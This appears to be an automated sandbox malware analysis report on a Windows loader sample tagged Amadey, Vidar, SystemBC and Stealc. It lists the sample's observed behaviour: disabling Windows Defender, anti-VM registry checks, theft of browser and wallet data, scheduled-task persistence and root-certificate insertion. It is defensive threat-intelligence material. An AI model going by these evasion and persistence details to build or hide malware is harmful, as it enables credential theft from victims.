Malware Analysis Report

2025-04-03 09:29

Sample ID 250302-crlqra1nt9
Target 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
Tags
092155 amadey systembc vidar ir7am credential_access defense_evasion discovery execution spyware stealer trojan gcleaner healer stealc trump dropper evasion loader persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77

Threat Level: Known bad

The file 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe was found to be: Known bad.

Malicious Activity Summary

092155 amadey systembc vidar ir7am credential_access defense_evasion discovery execution spyware stealer trojan gcleaner healer stealc trump dropper evasion loader persistence

GCleaner

Modifies Windows Defender TamperProtection settings

Vidar

Modifies Windows Defender Real-time Protection settings

Systembc family

SystemBC

Detect Vidar Stealer

Vidar family

Modifies Windows Defender DisableAntiSpyware settings

Amadey family

Detects Healer an antivirus disabler dropper

Gcleaner family

Healer family

Stealc family

Healer

Modifies Windows Defender notification settings

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Downloads MZ/PE file

Reads user/profile data of web browsers

.NET Reactor proctector

Identifies Wine through registry keys

Reads user/profile data of local email clients

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Windows security modification

Executes dropped EXE

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Program crash

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Modifies registry class

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Checks processor information in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-02 02:18

Signatures

Amadey family

amadey

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-02 02:18

Reported

2025-03-02 02:21

Platform

win7-20241010-en

Max time kernel

71s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2904 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2904 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2904 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2904 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2984 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2984 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
